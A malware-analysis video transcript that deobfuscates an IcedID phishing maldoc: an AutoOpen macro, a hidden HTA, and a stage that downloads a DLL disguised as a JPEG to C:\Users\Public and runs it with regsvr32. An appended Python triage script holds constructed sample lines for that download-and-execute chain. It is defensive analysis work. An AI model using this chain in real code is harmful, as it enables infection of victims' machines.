Unraveling the IcedID Malware Stager & Phishing Email

Captions
Hello John, quick background here: my friend/boss/co-worker/arch nemesis was sent an email from one of their trusted contacts that said "Hello, important information for you, please see the attachment. Password: ujy55. Thanks and take care." What an ironic ending. He was of course later confirmed to have been compromised. Defender identified some kind of Trojan and stopped my friendly co-worker/boss/nemesis from destroying his computer. Attached is the file if you'd like to investigate. Thanks and take care, Lauren.

In this video we are going to take a look at that attached file. We're going to explore what compromised her boss's computer and get to know how this all happened. This is going to be a maldoc file, or a malicious document: a malicious Microsoft Word document, which comes with Microsoft Office. With that said, we are going to be exploring and taking apart some obfuscated scripting language code, stuff that will naturally, inherently run on Microsoft Windows as a target operating system, with some scripting language stuff so that you can more easily read it and understand the source code, and for me too, because I'm not super duper smart with all those compiled binaries and digging through disassembly and firing it up in a debugger and all that elite hacker stuff. Hey, if you are interested in that, if you want to be doing some of that hardcore reverse engineering, please take a look at this video's sponsor, Zero2Auto, and the training course and curriculum that comes from 0ffset Training Solutions. With that, I'll go ahead and roll the promo, and please go take a look at all the sweet stuff they have to offer.

Zero2Auto offers in-depth and quality training on all things malware analysis and reverse engineering. You learn to cut through malware samples, understand the threat landscape and automate your workflow. Within the training you get access to 25 hours of video content covering cryptographic algorithms, initial malware stagers, malware evasion techniques, core malware functionality like for banking Trojans, worms, web injects and more. You dig into the exploitation process and learn what exactly is needed for professional threat intelligence. Included with the course is a 10% discount on an IDA Pro named license or an IDA Home license, a three-month premium plan to the any.run sandbox, and access to an exclusive Discord server where you can collaborate with other students, get support for training material and receive new malware challenges. Right now the course has over 1500 students registered, and they always have access to new malware to cut up and learn from. Of course, the training comes with a final exam and a course certification, with both a theoretical segment and a hands-on practical challenge where you reverse engineer custom malware and craft a report based off of your findings. The Zero2Auto training comes from some seriously big names in the industry, to include Vitali Kremez, Daniel Bunce and Jason Reaves. I'm sure you have seen them sharing incredible research and threat intel, and this is your opportunity to learn from some of the best. Check out the links in the description to jump into some Zero2Auto training right now and get 20% off by using the code malware at checkout. If you're perhaps looking for something slightly less advanced, they're also in the process of remastering their original beginner malware analysis course, for which pre-registration is now open. If you head to 0ffset.net/beginner.0 (that "o" being a zero) you'll be able to register early for the course and grab an early bird discount. Huge thanks to 0ffset Training Solutions for sponsoring this video.

Okay, so I am over here on my computer screen. I am inside of a Windows 10 virtual machine that has Microsoft Office installed so that I can go ahead and play with this maldoc file. I do have the network connection disabled; it is physically removed from my virtual machine here. I can go ahead and open up the info.zip file that was attached to this email. There is our tell 12010 2021.doc. We can go ahead and extract all of these onto our desktop. We'll go and extract that there and, oop, there we go, Defender immediately found something. Microsoft Defender is jumping into action here and they say "oops, we found a threat". We see the Trojan dropper for IcedID, and we can go ahead and quarantine that, remove it or allow it on the device. I am going to go ahead and allow it on the device so I can do some further digging, so we'll go ahead and select that and start actions. Now let me go ahead and move that away. I do have this document here now ready for us, and you know, we'll go ahead and pull the trigger: let's open this thing up in Microsoft Word and, ooh, take a look here. This is kind of the classic, usual phishing scheme or social engineering trick that says "hey, this document was created in previous versions of Microsoft Word; to view or edit this document please click Enable Editing and then click Enable Content". Now note, these are the things that will actually trigger and detonate malware that has been included in a Microsoft Word document, so that is not really recommended as you're doing your own analysis; obviously that is what will start the problem and let the malware run free. We will not go ahead and click Enable Content, but we will go ahead and explore what is actually in this macro.

So I'm going to move into the View tab, and you can see Macros is accessible right over on the top right. We'll go ahead and view macros, and you'll note there is a macro included here called AutoOpen. Now we'll want to go ahead and edit this and see what is actually present here. I don't know if you can see this text here; I'll see if I can make this a little bit bigger. Okay, now hopefully that's a little bit easier to read. Note we have a public subroutine called AutoOpen. AutoOpen is going to be what exactly runs and executes as this document is opened and Enable Content / Enable Editing is clicked. So we have this structure for a function here; we have a little bit of data that we could end up kind of cleaning or indenting to make this a little bit easier to read, but this is the block of our subroutine. We define a variable, "YouTube pal", set to StrReverse of ThisDocument.text1, passing in the argument "keywords". Following that, we end up using a With block, a little context manager, with the ActiveDocument: let's go ahead and SaveAs, given a FileName set to "YouTube pal", the value returned from setting this variable above, specifying the FileFormat set to 2. Man, we don't really exactly need to care about what that might be; I'm going to assume maybe plain text or ASCII. And then once we're done with that With block, we specify ThisDocument.s with an empty string and "YouTube pal" passed in as arguments, to presumably another subroutine.

So first of all we need to figure out what is happening at the very, very first line. We have "YouTube pal" being defined as the reversed string of ThisDocument.text1 of "keywords". Now the question is, what is text1? You might be able to click around a little bit more in exploring what the macros will show you in the Microsoft Visual Basic for Applications editor. You can see references to Normal, here's our main module, and the Microsoft Word objects just at the top here will include the ThisDocument settings. Now if I double click on this, you'll notice, oh, it changes what's available in our editor. If we clean this up just a little bit so we can make some sense of it, we do have some functions that are defined, and you might notice there is our text1 function. We'll start here and we'll get to explore a little bit. It takes in an argument, "door like like", okay, weird random variable name, and then text1 is going to be set as a value. Now note this is the same exact name and value of the function name itself, right? That is actually how Visual Basic script, or VBA, and these Visual Basic applications will return a value from a function: the value set to text1, the same name as this function, is exactly what this function will give back out to the main StrReverse call here. Now it's taking in this "keywords" string as the argument to text1, so that means that we're going to end up taking the ActiveDocument.BuiltInDocumentProperties of "door like like", the argument passed in as "keywords"; we retrieve the value from that and that's what this function will return. But then we run contents. Now contents, as you'll note above, is another function, Function contents. What it does is take the ActiveDocument.Content and then find and execute a Find of the text "X8", replacing it with nothing, an empty string here. Replace is equal to 2; maybe that's just referring to plain text once again. We can kind of hit the "I will leave" button there, and then remember, after contents has run, after we saved this document, that returned here given the ActiveDocument that is pulled from in that contents function, we end up calling the ThisDocument.s function that takes in the arguments of an empty string and "YouTube pal", which is returned as the reverse of our keywords, and that ultimately runs something different. It takes in arguments like "like load" and "Carol next love", and then it creates an object. This is going to end up being, hey, some quick little Windows internals object, and I might be saying the right words there or the wrong words there, but hey, it's an ActiveX object, or some of the things that allow you to dig into other capabilities and functionality of Windows in a lot of those scripting languages. We run text1 based off of, oh, retrieving our properties; "category" is the name here. And then from that object that's created based off of the Category property, we'll go ahead and exec, see, Windows Explorer and "Carol next love", which is what would be passed in as the second argument. So, interesting: it seems like we define a variable, and then it gets saved as a file name with the contents given from this document, and then we try to stage it to be able to open it in Internet Explorer, or excuse me, the Windows File Explorer, right?

So let's explore this. Let's go see how we might be able to determine, hey, we've got this document text1 that we were able to track down, but now we need to find the built-in document properties. Well, these are things that you'll actually be able to retrieve within Microsoft Word. If you go check out the File tab and you select Info, it shows you some of the properties. Might be a little bit interesting here: you see some size, page length, words included. Words is a little bit interesting because that's not what we saw from just the front of it. And then Tags is "ath.ekil...", weird. Author is this, last modified by that. So there's more that we might be able to explore here, though, if we click on that Show All Properties button down on the very bottom right. Show all properties, we'll expand this, and I'm curious though, it doesn't give me more. I was hoping for the keywords value. We can see Categories is included here as WScript.Shell, which makes sense for it trying to create an object from WScript.Shell and then try to execute some function. Now if I click on the Properties button here you can move into the Advanced Properties, and this brings it up here for us. Now we can see the title, subject, author etc., but Keywords is included; that looks to be the very same as that Tags value down there. Peculiar thing: this is reversed. Remember, if we take a look at this, this is the value that we end up seeing reversed inside of our document. Going back to our macro code here in VBA, we get this value and then we reverse it. So let's go find out what that "YouTube pal" value should actually be.

I'm going to pivot in and out of REMnux here; REMnux I'll be using for a little bit more analysis that is not within the actual Windows 11 virtual machine with Microsoft Office. So what I'll do is I'll just create a, I don't know, play.py file, and that's just fine here. Now I've pasted this in, and you know what, we don't really need to do this with a Python script; you could do this in like bash, or literally anything, pipe it to rev. But if we were to just go ahead and print this out as a string and then let's reverse it: we'll go ahead and use the square braces to go ahead and slice, but we'll use no beginning or end of it and we'll set the iterator, or the step, to be negative one. That will go ahead and reverse that string for me here. Now if I move that into my terminal I can go and run that, and you can see, ooh, there's our value: likepowlike.hta, HTA being a hypertext application, or one of those "ooh, Microsoft Windows willingly going to execute some code" things that it will just run with any user clicking on the link or opening it through the Windows File Explorer. So this will be the true file name that this thing saves as. We should go ahead and actually maybe create our own likepowlike.hta file, and then we'll go ahead and see what the contents might actually be. Remember, "YouTube pal", that variable, is now set to likepowlike.hta, but the actual contents that we end up saving are the contents of our active document. But don't forget, from our previous contents function that ran, what we do is we take the ActiveDocument.Content and then we replace all of those X8 values that might be potentially there with an empty string. It just removes them all; it just deletes them. So why don't we go see what in our active document might actually be included here. You might remember, well, it's pretty dull, it's pretty boring; there's really nothing here other than this phishing lure. Oh, sorry, I don't know why my screen might glitch out when trying to full screen. But note, if I were to try and select everything, or hit Ctrl+A on my keyboard to select, hey, there's more than just the image here. You could probably see it pretty well; maybe this is just text that happens to be white. If I change this color to red, yeah, there's a lot of noise and nonsense here, or even black, whatever we end up doing here. This is the value that we would want to copy and paste.

So let me go bring that into our other REMnux virtual machine, and will it let me here, oh, I'm not sure, here we go, slap it in just like this. Note this has all of those X8 values, a little bit of a mess here, but we can clean this up, right? We can just use that find and replace functionality and find all of the X8 values and replace them with nothing. I'm going to Ctrl+Alt+Enter on my keyboard to go ahead and find and replace everything within Sublime Text, and now we have a little bit more readable HTA-style syntax. Note that it's starting with an HTML file and a whole lot of nonsense that we can dive into. So let's save this; we'll call this, I suppose, original, or we could just leave it as the current file name, and then let's start to modify it, because I would like to make this a little bit easier to read. So what I'm going to end up doing is just firing up a web browser and probably going to, like, oh, some cheesy HTML beautifier online. There's one: HTML viewer, beautify HTML, give me that, thank you, looking good. Let me go ahead and set that syntax to HTML within our Sublime Text editor here, and now we have a little bit more to read.

Check it out: you'll notice that we start with HTML as the normal HTA syntax and structure. We define some elements as, like, regular paragraphs, but they all have unique ID values and the same sort of variable naming as our macro: "door light girl", "Dao girl Dao", "next love love", and some weird stuff. Okay, so "next love love" just looks to be the alphabet. I'm assuming "Dao girl Dao" is just base64, uh oh, but there's some weird stuff in there; you can see there's hyphens there. And then we have other JavaScript functions that are defined here. So, like, "tube door" is going to be a new ActiveXObject of the argument, so that's worthwhile to note. How often do we run this? We don't; that is not executed, at least in here, at least on that stage; that's kind of weird. "load down next", oh, "load down next" is going to end up getting an element by an ID value and getting the actual text of it. So when, in later functions, we use that function "load down next" to get an ID, that's our "next love love" here, here's our alphabet, right? So that's pulling that, with "door pound next" as our variable. We have "like like" set to an empty string. Other functions here: "Carol Carol like" returning a "cha cha", that's kind of odd, I don't know why it just prepends that there. Do we ever run this function? No, not in this stage. Okay, so let's see what we might be able to dive into within this function. We have some other variables that are defined, and then it looks like it uses some regular expressions to be able to replace content as needed and then do some oddball math. Okay, I don't exactly want to bother trying to reverse engineer this and, you know, see what happens where and when, but truthfully we probably don't have to. We might be able to finagle this and just let it go ahead and, I don't know, display this out, rather than go ahead and eval, because one of these functions, as you can see up here, "door light girl", is simply eval. So where do we call "door like girl"? Oh, we use it down here, and the function "door pow Carol", "load down next", is what's going to be retrieving that value. So it gets the eval string, and "like door Carol" is the current window, moving to weird locations, but using window indexed at the variable, and the value eval will allow it to execute something, and "next load U" is going to be the argument that's passed in. So "door pal Carol", sounds so stupid, I'm sorry, we'll end up calling it with "door tube load". Okay, so "door tube load" is "love girl Dao"; you download, what is this video? "love girl Dao" is doing some of the, presumably, yeah, yeah, okay, so this is going to be the function that modifies it, and then "load like Dao" does some splits and reverses.

Okay, so can we clean this to just be its own JavaScript script, like just regularly run stuff? So let's say, um, cleaned JavaScript, maybe .js. So we know that our alphabet is over here, and let me turn word wrap on so we can see that a little bit better. Where did we put our value of "next love love"? We put that here, so that can be changed to just be the alphabet, or the printable character set, right? Let's grab all of those and put them where "door pound next" was, I believe, right? And then we need, oh God, "next love love" is good. What else do we do with "door like girl"? Remember, that's eval. Okay, so we can just replace that there, and honestly, because that just returns it, we can just put the string eval, right? So that can go away. And now we have "Dao girl Dao" as this weird random data; let's just set that as a string. I'm getting some weird, horrific syntax highlighting because of all of our HTML crap, so let's try and nerf these. And that was called, oh goodness, what now, "girl doll", yeah, so var can equal all of that. Looking good. So we don't need to do "load down next" anymore, because now we have those variables present, pulling them in, and that's all that we end up pulling here for the rest of this code. Okay, so "Dao girl Dao" will be split, and then we end up taking some "door tube load". I'm sorry, I don't know if this is making sense to you, but it is to me, because we are just rearranging these variable names; despite being whatever they are, we're just kind of cutting it up so that we can grab what we need. Now the other things that are run here, like these functions that are defined up here, we don't need to use eval to actually detonate this thing, and you know what, let's try and remove some of these scripts. What does "like door Carol" do? Oh, that's the one that is the window, so we don't need to close the window in this case, but it would have tried to close the window, right, had this been a natural WScript or HTA file that goes ahead and detonates. And then we will call this, and then call this, um, "door", that is going to run eval in its current state. And let's remove these script tags because they aren't exactly necessary. Um, oh shoot, is this Visual Basic script? Yeah, so not JavaScript; I wrote the wrong thing. That's weird, the rest of it was JavaScript; it just, like, switches in and out of those different languages. I don't know if I like that. Anyway, we can clean the rest of this, and some of these will have a little bit more indentation to them. Oh God, I ruined everything. Yeah, whatever, I'm fine with that; this is all because it needs to be indented, sure. I'm good, I'm good, I'm good, I believe it, I trust it. I think we have everything cut up; we just need to make sure that we don't actually detonate this by using eval. We want to actually just go ahead and use something like console.log or WScript.Echo. The thing is, we don't even need to use this; we can just use WScript.Echo, can we not? Let's try a WScript.Echo, because I do want to be able to run this on the Windows machine and let it unravel things. So now "call" is what would be run in Visual Basic script, but let's just start with trying to run it, run the function that will let this all unravel, and yeah, that's it; it's gonna echo its own within this function, so maybe we can trust it. Should we try it? Let's go experiment, let's go play.

I'm gonna go over to my Windows 10 box, and let's create a new Notepad file; we'll just call it, like, test.js. Perfect. Okay, now I'm going to go ahead and I want to open that. I don't have the terminal, I don't have, like, Windows Terminal because I'm on Windows 10, but let's move into the desktop, let's go and run notepad on test.js, fire that thing up, and let's paste in all this crappy code here. And now, fingers crossed, let's run test.js. Oh, something broke: window is undefined. Yeah man, because you're not in a stupid... where did you even get window from? Is window in here? Oh yeah, it is, I'm sorry. I guess we don't really need that; those are the only things that would try to run with it, but yeah, we don't need to do that in this case, so let's nerf those out, and then just make sure we echo these. How about that, let's try this syntax, fire that up. Ooh, I want to be able to use cscript to run this so I can actually display it on the command line. So cscript, hello, I don't know, clear the screen, cscript please, test.js, and this is the next dump that it tries to run here. So that would be, I guess, stage one, how about that? Well, I don't know, stage1.js, still going to be JavaScript. And I didn't end up printing out the next one, which truthfully we should do on "load load girl", and that, I guess, it can just spit it all out; we don't need to split those up. So this way we paste that syntax in, and now when we clean this, run it, we should have all of the data there. Now, I don't know, because I do see some URLs, and this one looks like a download link from, um, and I'm not quite sure if this is going to have data that will actually respond for us. Let's go ahead and paste this in. Uh, can you beautify this please? No, because it's not really HTML. What if I did like script, would you be able to clean that? And script, can you clean that? Yeah, thank you, thank you, thank you.

Okay, cool. So what we do from here is we create a new ActiveXObject where we would be able to go ahead and download things. So let's rename that variable, and let's not make this as confusing as the last one was. So XMLHTTP object is really what we want to call that, and then we open to copelandbenefitg, yada yada yada, random variables that would probably be keyed to the specific target, and then we send that request. And if we actually get a successful response in the HTTP status, then we load "love load like" with an ADODB.Stream, where we could go ahead and write all the response contents and put it into C:\Users\Public\loadlikeload.jpg, and then we will detonate it with regsvr32. So that is likely a DLL file, because that's how you would invoke DLL files, dynamic link libraries, with an actual JPEG file here. I'm not quite sure if this link... yeah, JPEG file that is not a JPEG file; it is a DLL file. I'm not quite sure if this is actually going to still exist, because it has been some time since this was sent to me, and I doubt this domain is still alive. But if it isn't, hey, you know, we had a lot of fun at least rolling down to this point, and I think I'm okay with that as a video, so forgive me. Let me try and curl this thing. Not found, yeah, you can see it here. That server is still up though; however, the copelandbenefitg.com is still a thing. Well, I don't know how much further we'll be able to go with that kind of taken offline. It would be worthwhile doing some maybe Googling around and learning, hey, you know, what is this thing, if it exists. Ooh, this domain has been suspended due to non-completion of an ICANN-mandated contact verification. Fascinating. Okay, was this ever on any, like, IOCs, indicators of compromise? Obviously domains. HP Threat Research looks like it has one from TA551. HP Threat Research, oh, super slick, HP security that was doing a lot of their stuff. What is TA551? I'm assuming we're going to find out that that is IcedID, GOLD CABIN, anyway. They do have this in here, right; if I search for, yeah, copelandbenefitg, and this was way back around that same time frame when this email was sent, 2021, December 10th, so about a year ago, well, as I'm recording this. MITRE ATT&CK is tracking this financially motivated threat group that's been active since 2018, email-based malware distribution campaigns. If folks aren't familiar, by the way, the MITRE ATT&CK framework is an incredible resource that kind of just lays the groundwork and sets a standard for how folks can talk about malicious activity or attack techniques, tradecraft, TTPs: tactics, techniques and procedures. You'll notice that all of these are kind of broken down into techniques and then eventually sub-techniques, and still mapping specific groups or threat actors or adversaries. It's interesting to see what they might kind of trigger here, noting that, hey, we do have obfuscated variable names and JavaScript configuration files. What did they say? They mask DLLs as .dat files and JPEG files; we would have seen that had this continued. Used mshta to execute payloads, regsvr32 to load malicious DLLs, etc. etc. Prompted users to enable macros within spear phishing attachments to install malware. I didn't see any indicator of IcedID, or "ice did", or however people say that, I don't know. Oh, here it is, here's one from Red Canary. Red Canary do incredible stuff as always. TA551, also known as... the same group that we were tracking, uses large-scale phishing campaigns to deliver additional malware payloads. IcedID and Valak are the predominant payloads we observed with phishing campaigns in 2020. Oh, so this is actually pretty old, Shathak in 2020, and this is probably the exact same attack chain: email with password protected zip archive. Remember that password protection is to trigger, and/or keep it safe so that antivirus won't immediately flag it, if there's any opportunity for it to kind of squeeze under the radar; at least archiving the zip file with a password doesn't let the antivirus software kind of peer into it. User opens document, enables macros, two-thirds of detections stop here. Yep, okay, so those are options that you might be able to block or stop the kill chain here. Network connection to download next stage DLL installer, and that would be what we would have continued on down the road for. DLL installer to execute follow-on payload with regsvr32. A second stage payload will be Ursnif, ZLoader, Valak, IcedID, or QakBot, or Qbot, there. So I guess we didn't dig into the real fun stuff here, truthfully, but we did get into the stager, and maybe that was kind of neat. So you can see some of those, again, living off the land techniques, the tricks that it might use. Trend Micro is tracking this just as well, Unit 42, oh, SANS even, just as well; lots of great folks keeping an eye on this one. It was hot, but that is how we might follow through with it, and you might be able to do the very, very same.

So hey, with that said, thanks so much for watching everybody. I hope this was a little bit of a fun one, hey, just unraveling some more pieces, playing with payloads and seeing what we might be able to de-obfuscate and get into, or just track, and you know what variables go where, here and there, and maybe you'll learn a little bit or two with that. If you haven't, you know what, you are going to learn a heck of a lot of stuff with the sponsor of today's video, Zero2Auto, and their training course. It digs into some of that super sweet low-level disassembly, running stuff up with a debugger when it's a compiled application like an EXE, portable executable, or a DLL, dynamic link library. So had we grabbed that IcedID actual payload, you would be able to cut that up with the same skills and stuff that you learn within that sponsor. So hey, please, please, please go check them out, see what they can do for you and learn some great stuff. Kudos and all the credit and love to Zero2Auto and 0ffset Training Solutions. So with that, I'm done rambling. This has been a little bit of a long video, and it didn't need to be, but if you did enjoy this video, please do those like, comment, algorithm, subscribe stuff, you know, the same thing that I say at the end of every single video, but I super appreciate all your support, and it's six in the morning, so I'm gonna go to bed. Bye everyone, see you soon.
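A Python triage helper, added here as an example (it is not John's script from the video and not the malware's own code), that replays the stager's two transformations on constructed sample input: StrReverse of the Keywords property to recover the .hta file name, and the Replace() that strips the "X8" junk token from the hidden white-text body. It then scans the recovered HTA for the chain elements walked through above (ActiveX ProgIDs, download URL, drop path under C:\Users\Public, regsvr32, eval) and applies the eval-to-WScript.Echo swap used in the video. The property values, junk-laden body and URL are constructed stand-ins, not values from the real sample.

```python
import re

# Constructed stand-ins for the maldoc's built-in document properties: the
# macro reads the reversed HTA file name from Keywords and the ProgID it
# launches the dropped file with from Category (both shown in the video).
SAMPLE_PROPERTIES = {
    "Keywords": "ath.ekilwopekil",   # constructed: reverse of likepowlike.hta
    "Category": "WScript.Shell",
}

# Constructed stand-in for the hidden white-text document body: HTA markup
# with the junk token "X8" sprinkled in, which the macro's contents()
# routine deletes with Replace before SaveAs with FileFormat 2 (wdFormatText).
JUNK_TOKEN = "X8"
SAMPLE_BODY = (
    "<htX8ml><heX8ad><scriX8pt language='javascript'>\n"
    "var req = new ActiveXX8Object('MSXML2.XMLHTTP');\n"
    "req.open('GET', 'http://example-X8lure.invalid/stage.jpg', false);\n"
    "var st = new ActiveXObject('ADX8ODB.Stream');\n"
    "st.SaveToFile('C:\\\\Users\\\\Public\\\\loadlikeload.jpg', 2);\n"
    "new ActiveXObject('WScript.X8Shell')"
    ".Run('regsvr32 C:\\\\Users\\\\Public\\\\loadlikeload.jpg');\n"
    "eval(decoded);\n"
    "</script></head></html>"
)

# Chain elements discussed in the analysis, as regexes over the cleaned HTA.
INDICATORS = {
    "activex_object": r"ActiveXObject\(\s*['\"]([^'\"]+)['\"]",
    "url": r"https?://[^\s'\"]+",
    "drop_path": r"[A-Za-z]:\\+Users\\+Public\\+[\w.]+",
    "regsvr32": r"\bregsvr32\b",
    "eval": r"\beval\s*\(",
}

def recover_hta_name(properties):
    """Stage 1 of the macro: StrReverse(Keywords) yields the HTA file name."""
    return properties["Keywords"][::-1]

def strip_junk(body, token=JUNK_TOKEN):
    """Stage 2: delete every junk token, as the macro's Replace(token, "") does."""
    return body.replace(token, "")

def scan_hta(text):
    """Collect the chain indicators present in the recovered HTA text."""
    found = {}
    for name, pattern in INDICATORS.items():
        hits = re.findall(pattern, text, flags=re.IGNORECASE)
        if hits:
            found[name] = sorted(set(hits))
    return found

def chain_steps(properties, hta_name, indicators):
    """Map what was found onto the delivery chain the video reconstructs."""
    objs = {o.lower() for o in indicators.get("activex_object", [])}
    steps = []
    if hta_name.lower().endswith(".hta"):
        steps.append("drops an .hta file")
    if properties.get("Category", "").lower() == "wscript.shell":
        steps.append("launches it through WScript.Shell")
    if "eval" in indicators:
        steps.append("decodes the next stage with eval")
    if "msxml2.xmlhttp" in objs and "url" in indicators:
        steps.append("downloads a follow-on payload")
    if "adodb.stream" in objs and "drop_path" in indicators:
        steps.append("writes it under C:\\Users\\Public")
    if "regsvr32" in indicators:
        steps.append("runs it as a DLL via regsvr32")
    return steps

def neuter_eval(script):
    """The video's trick: swap eval(...) for WScript.Echo(...) so cscript
    prints the decoded next stage instead of executing it."""
    return re.sub(r"\beval\s*\(", "WScript.Echo(", script)

def triage(properties, body):
    """Run the whole pipeline and return every intermediate worth keeping."""
    hta_name = recover_hta_name(properties)
    hta = strip_junk(body)
    indicators = scan_hta(hta)
    return {
        "hta_name": hta_name,
        "indicators": indicators,
        "chain": chain_steps(properties, hta_name, indicators),
        "safe_script": neuter_eval(hta),
    }

if __name__ == "__main__":
    for step in triage(SAMPLE_PROPERTIES, SAMPLE_BODY)["chain"]:
        print("-", step)
```

On a real document, feed in the Keywords and Category values from Advanced Properties and the Ctrl+A text of the body; the junk token is whatever string the macro's Replace call targets.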
Info
Channel: John Hammond
Views: 75,046
Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners
Id: btHQYWoG3nU
Length: 33min 34sec (2014 seconds)
Published: Mon Dec 12 2022